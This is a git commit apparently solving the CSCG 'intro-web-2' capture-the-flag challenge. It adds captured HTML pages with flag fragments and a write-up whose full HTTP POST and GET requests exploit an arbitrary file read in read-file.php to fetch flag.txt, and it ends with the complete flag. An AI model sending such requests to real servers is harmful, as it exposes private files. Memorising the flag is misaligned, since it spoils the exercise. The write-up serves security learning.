solved intro-web-2

This commit is contained in:
2024-03-02 04:15:56 +01:00
parent 629146f68f
commit 6086a4335f
11 changed files with 2180 additions and 2916 deletions

Binary file not shown.

File diff suppressed because it is too large Load Diff

View File

@@ -1,5 +1,5 @@
#HSQL Database Engine 2.7.2
#Sat Mar 02 03:32:43 CET 2024
tx_timestamp=543
modified=yes
#Sat Mar 02 04:14:43 CET 2024
tx_timestamp=61202
modified=no
version=2.7.2

File diff suppressed because it is too large Load Diff

View File

@@ -0,0 +1,19 @@
<html>
<head>
<title>Intro to Web 2</title>
<meta charset="UTF-8">
<link rel="stylesheet" type="text/css" href="style.css" />
</head>
<body>
<h1>Burn After Reading</h1>
This page automatically retrieves confidential information.
To protect against unauthorized use, the backend server will irreversibly nuke all of our data in
case this page is accessed by someone that failed to pass our
<em>Military-Grade Security Gate&#8482;</em>.
<h3>Status of flag document:
<span style="color:green">INTACT</span></h3>
<hr>
<pre>
Flag part 4/4: W4at6R2B}</pre>
</body>
</html>

View File

@@ -0,0 +1,16 @@
<html>
<head>
<title>Intro to Web 2</title>
<meta charset="UTF-8">
<link rel="stylesheet" type="text/css" href="style.css" />
</head>
<body>
<h1>Statistics Console (POST version)</h1>
<h3>File Name:
<span style="font-family: 'Courier New', monospace;">flag.txt</span></h3>
<hr>
<pre>
Flag part 2/4: UaT0BVvk</pre>
</body>
</html>

View File

@@ -0,0 +1,16 @@
<html>
<head>
<title>Intro to Web 2</title>
<meta charset="UTF-8">
<link rel="stylesheet" type="text/css" href="style.css" />
</head>
<body>
<h1>Statistics Console (GET version)</h1>
<h3>File Name:
<span style="font-family: 'Courier New', monospace;">flag.txt</span></h3>
<hr>
<pre>
Flag part 3/4: Q9Z39J9A</pre>
</body>
</html>

View File

@@ -1,2 +1,57 @@
### 1.Part
We can spoof our OS with the help of ZAP and get the site [train.html](leaked_sites/train.html)
### 2. Part
There is an unsecure statistics service which shows you the content of every file you specify. We can use this to get the content of flag.txt.
Sending the following request:
```http
POST https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/read-file.php HTTP/1.1
host: 722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Content-Type: application/x-www-form-urlencoded
content-length: 17
Origin: https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337
Connection: keep-alive
Referer: https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
filename=flag.txt
```
Yields the page [statistics_console.html](leaked_sites/statistics_console.html)
### 3. Part
A similar bug can be used with a GET request to get the content of the flag.txt file.
This time we use a faulty php file called read-file.php
```http
GET https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/read-file.php?filename=flag.txt HTTP/1.1
host: 722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337
User-Agent: Mozilla/5.0 (Macintosh; Intel Mac OS X 10.15; rv:123.0) Gecko/20100101 Firefox/123.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Connection: keep-alive
Referer: https://722e3ca3e92b68ceff5803fd-1024-intro-web-2.challenge.cscg.live:1337/
Upgrade-Insecure-Requests: 1
Sec-Fetch-Dest: document
Sec-Fetch-Mode: navigate
Sec-Fetch-Site: same-origin
Sec-Fetch-User: ?1
content-length: 0
```
Returns the page [statistics_console_get.html](leaked_sites/statistics_console_get.html)
### 4.Part
We now have to intercept a request made and change the authority information.
When we do this we get the fourth part of the flag.
### flag
CSCG{l9jj550KUaT0BVvkQ9Z39J9AW4at6R2B}